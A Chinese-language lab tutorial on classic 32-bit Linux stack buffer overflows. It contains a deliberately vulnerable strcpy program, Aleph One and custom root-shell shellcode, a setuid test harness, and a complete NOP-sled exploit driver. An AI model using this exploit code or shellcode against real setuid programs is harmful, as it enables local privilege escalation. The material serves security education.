linux缓冲区溢出学习

漏洞代码:

//meet.c
#include<stdio.h>
/*
 * Deliberately vulnerable function -- this is the bug the rest of the page
 * exploits, so it is left exactly as written.
 *
 * temp2 is copied into the fixed 400-byte `name` with strcpy() and no length
 * check. An argument longer than 400 bytes (plus its NUL) runs past `name`
 * and, on a 32-bit frame-pointer build like the one described here, over the
 * saved EBP and the saved return address that sit just above it on the stack.
 *
 * Return type is implicit int (pre-C99); nothing is actually returned.
 * NOTE(review): <string.h> is never included, so strcpy is implicitly
 * declared -- a warning on older gcc, a hard error on recent gcc.
 */
greeting(char *temp1,char *temp2){
  char name[400];
  strcpy(name,temp2);   /* unbounded copy: the overflow */
  printf("Hello %s %s\n",temp1,name);
}
/*
 * Entry point of the vulnerable target. argv[1] and argv[2] are used without
 * checking argc, so running it with fewer than two arguments dereferences a
 * NULL pointer -- always pass exactly two. argv[2] is the argument that
 * overflows `name` inside greeting(). Implicit int return type, no return.
 */
main(int argc,char *argv[]){
  greeting(argv[1],argv[2]);  /* argv[2] is the attacker-controlled buffer */
  printf("Bye %s %s\n",argv[1],argv[2]);
}

 

调试语句:

gcc -mpreferred-stack-boundary=2 -o meet -ggdb meet.c

（注：这是 2012 年前后 32 位系统上的编译方式。在现代发行版上还要关掉各项缓解措施才能复现：加上 `-m32 -fno-stack-protector -z execstack`，并临时关闭 ASLR（`echo 0 | sudo tee /proc/sys/kernel/randomize_va_space`），否则后面硬编码的返回地址和放在栈上的 shellcode 都不会生效。）

gdb meet

list

b 6

run Mr `perl -e 'print "A"x403'`

（403 个 'A' 加上结尾的 NUL 共 404 字节，刚好越过 400 字节的 name；在这种 32 位、带帧指针的布局下，name 之上紧接着就是保存的 EBP 和返回地址，可以逐步增大长度在 gdb 里观察它们何时被覆盖。）

 

Aleph One（《Smashing The Stack For Fun And Profit》）的 shellcode，前面加了一段 setuid(0)

//shellcode.c
/*
 * Aleph One's classic Linux/x86 execve("/bin/sh") shellcode, prefixed with a
 * setuid(0) call. 53 bytes, no 0x00 byte anywhere, so strcpy() copies it whole.
 *
 * Decoded (i386, Linux int 0x80 ABI):
 *   31 c0 31 db b0 17 cd 80   xor eax,eax; xor ebx,ebx; mov al,23; int 0x80  -> setuid(0)
 *   eb 1f                     jmp to the call below ("jmp/call" trick to get the string's address)
 *   5e                        pop esi                ; esi -> "/bin/sh"
 *   89 76 08                  mov [esi+8],esi        ; argv[0] = esi   (written PAST the string)
 *   31 c0 88 46 07            xor eax,eax; mov [esi+7],al   ; NUL-terminate "/bin/sh"
 *   89 46 0c                  mov [esi+12],eax       ; argv[1] = NULL
 *   b0 0b 89 f3               mov al,11; mov ebx,esi ; execve, ebx = path
 *   8d 4e 08 8d 56 0c         lea ecx,[esi+8]; lea edx,[esi+12]  ; argv, envp (-> empty env)
 *   cd 80                     int 0x80
 *   31 db 89 d8 40 cd 80      xor ebx,ebx; mov eax,ebx; inc eax; int 0x80  -> exit(0) if execve returned
 *   e8 dc ff ff ff            call back to the pop esi (pushes the address of "/bin/sh")
 *   "/bin/sh"
 *
 * Because it patches bytes at esi+7..esi+15 it must sit in memory that is both
 * writable and executable (e.g. a non-NX stack); it faults from .text/.rodata.
 */
char shellcode[]=
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";
/*
 * Test harness for the shellcode above: overwrite this frame's own saved
 * return address with &shellcode so that returning from main() jumps into it.
 *
 * `ret` is assumed to sit directly below the saved EBP, so two words above
 * &ret is the saved EIP. That layout only holds for a 32-bit, frame-pointer,
 * unoptimised build with no stack protector and an executable data segment
 * (something like gcc -m32 -O0 -fno-stack-protector -z execstack) -- verify
 * the frame in gdb before trusting it. `void main` is non-standard.
 */
void main(){
  int *ret;
  ret=(int *)&ret+2;      /* [0] = ret itself, [1] = saved EBP, [2] = saved EIP (assumed) */
  (*ret)=(int)shellcode;  /* pointer truncated to int: correct on 32-bit only */
}

 获得当前esp值

#include<stdio.h>
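/*
 * Return the current stack pointer (low 32 bits of ESP/RSP), used to guess
 * where the target's stack buffer lives.
 *
 * The original used a basic asm statement that left the value in EAX and then
 * fell off the end of a non-void function -- undefined behaviour that only
 * happened to work at -O0. This version binds the value to an output operand
 * and returns it explicitly. x86 only; the %k modifier forces the 32-bit
 * register name so the instruction assembles in both i386 and x86-64 mode.
 */
unsigned long get_sp(void){
  unsigned long sp;
  __asm__ volatile("movl %%esp, %k0" : "=r"(sp));
  return sp;
}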
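/*
 * Print the stack pointer as seen inside get_sp(); it is the starting point
 * for the return address the exploit guesses. The value in ./meet will differ
 * somewhat (different argv/environment), hence the exploit's offset argument,
 * and it is only stable at all with ASLR disabled.
 * `%lx` matches the unsigned long get_sp() returns (the original `%x` was a
 * printf type mismatch).
 */
int main(void){
  printf("Stack pointer(ESP):0x%lx\n",get_sp());
  return 0;
}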

 perl -e 'print "\x31\xc0\x31\xdb\xb0\x17\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";'>sc

 

./meet Mr `perl -e 'print "\x90"x203'``cat sc``perl -e 'print "\x88\xf5\xff\xbf"x89'`

（注：`\x88\xf5\xff\xbf` 即 0xbffff588，是作者机器上测得的地址，必须用上面的 get_sp 程序或 gdb 重新测量。203 个 NOP 加 53 字节 shellcode 共 256 字节，之后的 89 个返回地址按 4 字节对齐排列，覆盖 name[400] 之上的保存 EIP；三段拼起来是 612 字节，作为第二个参数传给 meet。）

 

编写自己的shellcode

1.编写汇编

; Linux/i386 shellcode: setreuid(0,0) followed by
; execve("/bin//sh", ["/bin//sh", NULL], NULL).
; Written so it contains no 0x00 byte (registers zeroed with xor, syscall
; numbers loaded into AL only), so strcpy() in the target copies it whole.
section .text
global _start
_start:
; setreuid(0,0): eax = 70 (__NR_setreuid), ebx = ruid = 0, ecx = euid = 0
xor eax,eax
mov al,0x46
xor ebx,ebx
xor ecx,ecx
int 0x80

; execve(): build the path string and argv on the stack, then call it
xor eax,eax
push eax            ; NUL terminator of the path
push 0x68732f2f     ; "//sh" (little-endian)
push 0x6e69622f     ; "/bin" -> esp now points at "/bin//sh\0"
mov ebx,esp         ; ebx = pathname
push eax            ; argv[1] = NULL
push ebx            ; argv[0] = pathname
mov ecx,esp         ; ecx = argv
xor edx,edx         ; edx = envp = NULL
mov al,0xb          ; eax = 11 (__NR_execve)
int 0x80
; NOTE(review): nothing follows the syscall -- if execve fails, execution
; runs off the end of the shellcode into whatever bytes come next.

 2.生成可执行文件

nasm -f elf sc.asm

ld -o sc sc.o

（在 64 位主机上需要 `ld -m elf_i386 -o sc sc.o`。另外输出文件名 sc 会覆盖前面用 perl 生成的 shellcode 文件 sc，最好换一个名字。）

3.提取十六进制代码

objdump -d ./sc

[root@localhost root]# objdump -d ./sc
 
./sc:     file format elf32-i386
 
Disassembly of section .text:
 
08048080 <_start>:
 8048080:       31 c0                   xor    %eax,%eax
 8048082:       b0 46                   mov    $0x46,%al
 8048084:       31 db                   xor    %ebx,%ebx
 8048086:       31 c9                   xor    %ecx,%ecx
 8048088:       cd 80                   int    $0x80
 804808a:       31 c0                   xor    %eax,%eax
 804808c:       50                      push   %eax
 804808d:       68 2f 2f 73 68          push   $0x68732f2f
 8048092:       68 2f 62 69 6e          push   $0x6e69622f
 8048097:       89 e3                   mov    %esp,%ebx
 8048099:       50                      push   %eax
 804809a:       53                      push   %ebx
 804809b:       89 e1                   mov    %esp,%ecx
 804809d:       31 d2                   xor    %edx,%edx
 804809f:       b0 0b                   mov    $0xb,%al
 80480a1:       cd 80                   int    $0x80

 

4.放到程序里面测试shellcode

//sc2.c
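/* Raw bytes of sc.asm (setreuid(0,0); execve("/bin//sh")), taken from objdump. */
char sc[]=
  "\x31\xc0"              /* xor eax,eax              */
  "\xb0\x46"              /* mov al,0x46  (setreuid)  */
  "\x31\xdb"              /* xor ebx,ebx              */
  "\x31\xc9"              /* xor ecx,ecx              */
  "\xcd\x80"              /* int 0x80                 */
  "\x31\xc0"              /* xor eax,eax              */
  "\x50"                  /* push eax  (NUL)          */
  "\x68\x2f\x2f\x73\x68"  /* push "//sh"              */
  "\x68\x2f\x62\x69\x6e"  /* push "/bin"              */
  "\x89\xe3"              /* mov ebx,esp  (path)      */
  "\x50"                  /* push eax  (argv[1])      */
  "\x53"                  /* push ebx  (argv[0])      */
  "\x89\xe1"              /* mov ecx,esp  (argv)      */
  "\x31\xd2"              /* xor edx,edx  (envp)      */
  "\xb0\x0b"              /* mov al,0xb   (execve)    */
  "\xcd\x80";             /* int 0x80                 */

/*
 * Jump into the shellcode bytes to test them. sc[] lives in .data, so this
 * only works when that segment is executable: build 32-bit with an
 * executable data/stack segment (e.g. gcc -m32 -z execstack), otherwise the
 * call faults on any NX-enabled system.
 *
 * Converting an object pointer to a function pointer is not defined by ISO C;
 * gcc accepts the explicit cast as an extension, which is all this test
 * harness needs. The original cast via `void *` and relied on an implicit
 * conversion, and declared main() with an implicit int return type.
 *
 * Returns 0 only if the shellcode's execve() fails and falls through.
 */
int main(void)
{
  void (*fp)(void) = (void (*)(void))sc;
  fp();        /* on success execve replaces the process; no return */
  return 0;
}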

 5.设置SUID并执行

sudo chown root sc2

sudo chmod +s sc2

./sc2

（注意：这样会在系统上留下一个任何用户都能拿到 root shell 的 setuid 程序，实验完务必 `sudo chmod -s sc2` 或直接删掉，并且只在自己的虚拟机里做。`chmod +s` 会同时设置 setuid 和 setgid，这里只需要 `chmod u+s`。）

 

通用exploit代码

//exploit.c
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<unistd.h>
/*
 * Aleph One's classic Linux/x86 execve("/bin/sh") shellcode, prefixed with a
 * setuid(0) call. 53 bytes, no 0x00 byte anywhere, so strlen() sees all of it
 * and strcpy() in the target copies it whole.
 *
 * Decoded (i386, Linux int 0x80 ABI):
 *   31 c0 31 db b0 17 cd 80   xor eax,eax; xor ebx,ebx; mov al,23; int 0x80  -> setuid(0)
 *   eb 1f                     jmp to the call below ("jmp/call" trick to get the string's address)
 *   5e                        pop esi                ; esi -> "/bin/sh"
 *   89 76 08                  mov [esi+8],esi        ; argv[0] = esi   (written PAST the string)
 *   31 c0 88 46 07            xor eax,eax; mov [esi+7],al   ; NUL-terminate "/bin/sh"
 *   89 46 0c                  mov [esi+12],eax       ; argv[1] = NULL
 *   b0 0b 89 f3               mov al,11; mov ebx,esi ; execve, ebx = path
 *   8d 4e 08 8d 56 0c         lea ecx,[esi+8]; lea edx,[esi+12]  ; argv, envp (-> empty env)
 *   cd 80                     int 0x80
 *   31 db 89 d8 40 cd 80      xor ebx,ebx; mov eax,ebx; inc eax; int 0x80  -> exit(0) if execve returned
 *   e8 dc ff ff ff            call back to the pop esi (pushes the address of "/bin/sh")
 *   "/bin/sh"
 *
 * It patches bytes at esi+7..esi+15, so it must run from memory that is both
 * writable and executable -- the target's (non-NX) stack.
 */
char shellcode[]= /* setuid(0) + Aleph One execve("/bin/sh") */
  "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
  "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
  "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
  "\x80\xe8\xdc\xff\xff\xff/bin/sh";

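/*
 * Return the current stack pointer (low 32 bits of ESP/RSP); the exploit uses
 * it as the base for the return address it writes into the payload.
 *
 * The original used a basic asm statement that left the value in EAX and then
 * fell off the end of a non-void function -- undefined behaviour that only
 * happened to work at -O0. This version binds the value to an output operand
 * and returns it explicitly. x86 only; the %k modifier forces the 32-bit
 * register name so the instruction assembles in both i386 and x86-64 mode.
 */
unsigned long get_sp(void){
  unsigned long sp;
  __asm__ volatile("movl %%esp, %k0" : "=r"(sp));
  return sp;
}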
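/*
 * Generic stack-overflow driver for ./meet (Aleph One style).
 *
 * Builds a `size`-byte payload and passes it as meet's second argument:
 *   [0, size/2)            NOP sled (0x90)
 *   [size/2, size/2+len)   shellcode
 *   the rest               guessed return address, repeated every 4 bytes
 *   buffer[size-1]         NUL, so execl() sees a C string
 * As in the original, the address is first written over the whole buffer and
 * then partly overwritten by the sled and shellcode; the copies in the tail
 * are the ones that land on meet's saved EIP.
 *
 * argv[1]  payload size in bytes, decimal (default 500)
 * argv[2]  offset subtracted from the stack pointer, decimal (default 0)
 * argv[3]  stack pointer to use instead of get_sp(), e.g. 0xbffff588
 *
 * Fixes over the original:
 *  - the target is a 32-bit binary, so the address is emitted as 4
 *    little-endian bytes regardless of this program's word size (the original
 *    stored `long`s, which are 8 bytes on x86-64 and overran the heap buffer);
 *  - `size` is validated so sled + shellcode + NUL always fit (the original
 *    wrote past the allocation for small sizes and indexed buffer[-1] for 0);
 *  - atoi() replaced by checked strtol(); malloc() and execl() failures reported;
 *  - execl()'s sentinel is (char *)NULL, not int 0; printf formats match types.
 *
 * Returns 1 on a bad argument or failed exec; on success the process is
 * replaced by ./meet and main() never returns.
 */
int main(int argc, char *argv[])
{
  enum { RET_BYTES = 4, SLED_BYTE = 0x90 };   /* i386 target: 4-byte saved EIP */
  long size = 500;
  long offset = 0;
  unsigned long esp = get_sp();
  unsigned long ret;
  size_t sc_len = strlen(shellcode);          /* shellcode has no 0x00 byte */
  size_t sled;
  char *buffer;
  char *end;
  long i;

  if (argc > 1) {
    size = strtol(argv[1], &end, 10);
    if (*argv[1] == '\0' || *end != '\0') {
      fprintf(stderr, "bad size: %s\n", argv[1]);
      return 1;
    }
  }
  if (argc > 2) {
    offset = strtol(argv[2], &end, 10);
    if (*argv[2] == '\0' || *end != '\0') {
      fprintf(stderr, "bad offset: %s\n", argv[2]);
      return 1;
    }
  }
  if (argc > 3) {
    esp = strtoul(argv[3], &end, 0);           /* base 0: accepts 0x... */
    if (*argv[3] == '\0' || *end != '\0') {
      fprintf(stderr, "bad esp: %s\n", argv[3]);
      return 1;
    }
  }
  ret = esp - (unsigned long)offset;           /* a negative offset moves up the stack */

  fprintf(stderr,"Usage:%s<buff_size><offset><esp:0xfff...>\n",argv[0]);
  fprintf(stderr,"ESP:0x%lx Offset:0x%lx Return:0x%lx\n",esp,(unsigned long)offset,ret);

  if (size <= 0) {
    fprintf(stderr, "size must be positive\n");
    return 1;
  }
  sled = (size_t)size / 2;
  if ((size_t)size - sled < sc_len + 1) {
    fprintf(stderr, "size %ld too small: need room for %zu shellcode bytes plus NUL after the sled\n",
            size, sc_len);
    return 1;
  }

  buffer = malloc((size_t)size);
  if (buffer == NULL) {
    perror("malloc");
    return 1;
  }

  /* 1. the guessed address at every 4-byte slot, little-endian; a partial
   *    slot at the end gets the address's low bytes, as the original's
   *    in-bounds bytes did */
  for (i = 0; i < size; i++) {
    buffer[i] = (char)((ret >> (8 * (i % RET_BYTES))) & 0xff);
  }
  /* 2. NOP sled over the first half: a return anywhere into it slides down
   *    to the shellcode */
  memset(buffer, SLED_BYTE, sled);
  /* 3. shellcode right after the sled (fits by the check above) */
  memcpy(buffer + sled, shellcode, sc_len);
  /* 4. terminator. meet copies the argument with strcpy, so neither the
   *    shellcode nor the address bytes may contain 0x00 before this point */
  buffer[size - 1] = '\0';

  execl("./meet", "meet", "Mr.", buffer, (char *)NULL);

  /* only reached if the exec failed */
  perror("execl");
  printf("%s\n", buffer);
  free(buffer);
  return 1;
}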

 
